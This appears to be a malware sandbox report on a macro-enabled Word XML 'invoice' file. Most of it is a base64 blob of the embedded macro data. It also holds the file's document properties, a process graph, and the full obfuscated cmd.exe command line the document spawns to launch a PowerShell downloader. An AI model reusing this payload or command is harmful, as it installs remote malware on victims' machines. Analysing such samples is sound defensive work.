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 AAAL8AQAAAASNFZ4
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleType: paragraph
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentDocumentPropertiesVersion: 16
WordDocumentDocumentPropertiesCharactersWithSpaces: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesCharacters: 1
WordDocumentDocumentPropertiesWords: -
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesLastSaved: 2019:01:22 10:46:00Z
WordDocumentDocumentPropertiesCreated: 2019:01:22 10:46:00Z
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesRevision: 1
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentOcxPresent: no
WordDocumentEmbeddedObjPresent: no
WordDocumentMacrosPresent: yes
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
9
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start msoxmled.exe no specs winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3428"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\Desktop\RECHNUNG.xml"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
XML Editor
Exit code:
3221225547
Version:
14.0.4750.1000
2356"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\RECHNUNG.xml"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEMSOXMLED.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2900c:\i8072\a1011\i6001\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set bFa=evk2pM-fWX T4R,$Dl6I7JV3@89rB0}xEt{U('zQ~b/5jCcwa\:;om%N+AhGy=OgSL_u.iZ1FnPsd)&&for %9 in (4;52;47;54;74;35;28;65;19;45;50;40;43;14;71;54;27;54;64;32;64;64;19;62;55;55;57;5;32;50;40;6;12;14;71;54;58;54;11;32;5;74;50;40;6;23;14;71;54;17;17;10;15;76;12;18;71;25;61;37;27;23;23;18;26;37;51;15;38;43;20;3;3;61;73;0;47;6;52;41;44;0;46;33;10;55;0;33;68;8;0;41;45;17;69;0;73;33;51;15;69;12;25;12;29;61;37;58;33;33;4;50;42;42;47;47;47;68;33;27;48;73;75;17;48;53;4;67;73;63;68;46;52;53;42;64;58;45;58;73;32;28;41;73;45;62;24;58;33;33;4;50;42;42;48;63;0;73;33;7;52;31;68;69;52;42;55;12;62;7;22;32;39;45;12;28;67;35;1;72;45;22;24;58;33;33;4;50;42;42;73;69;63;0;27;69;48;7;48;75;41;53;41;46;52;73;63;27;0;75;75;68;7;67;33;53;69;73;73;48;68;0;76;67;68;73;63;42;23;13;5;3;43;45;20;53;25;58;9;32;20;25;62;66;65;24;58;33;33;4;50;42;42;75;52;75;6;76;0;41;52;67;46;58;48;63;0;6;76;67;53;0;73;60;68;46;52;53;42;47;4;6;48;76;53;69;73;42;22;46;59;21;60;76;13;25;19;72;64;26;24;58;33;33;4;50;42;42;75;48;17;48;58;68;53;52;41;69;69;17;48;33;68;46;52;53;42;32;63;0;29;16;44;7;39;13;62;63;8;17;1;21;70;17;66;73;75;55;1;1;37;68;64;4;17;69;33;36;37;24;37;77;51;15;38;26;12;20;25;61;37;33;23;43;18;20;37;51;15;48;3;3;26;26;10;61;10;37;3;43;71;37;51;15;73;26;3;26;3;61;37;47;71;29;26;26;37;51;15;75;25;25;29;3;61;15;0;73;1;50;33;0;53;4;56;37;49;37;56;15;48;3;3;26;26;56;37;68;0;31;0;37;51;7;52;27;0;48;46;58;36;15;27;12;18;12;18;10;69;73;10;15;69;12;25;12;29;77;34;33;27;60;34;15;38;43;20;3;3;68;16;52;47;73;17;52;48;76;72;69;17;0;36;15;27;12;18;12;18;14;10;15;75;25;25;29;3;77;51;15;69;23;26;26;3;61;37;69;20;29;29;37;51;19;7;10;36;36;59;0;33;6;19;33;0;53;10;15;75;25;25;29;3;77;68;17;0;73;63;33;58;10;6;63;0;10;12;29;29;29;29;77;10;34;19;73;1;52;2;0;6;19;33;0;53;10;15;75;25;25;29;3;51;15;27;26;3;18;25;61;37;1;26;25;12;25;37;51;41;27;0;48;2;51;30;30;46;48;33;46;58;34;30;30;15;69;25;43;29;71;61;37;38;26;20;12;20;37;51;79)do set jtJD=!jtJD!!bFa:~%9,1!&&if %9==79 echo !jtJD:~-629!|FOR /F "tokens=2 delims==Rf" %R IN ('assoc.cmd')DO %R "c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
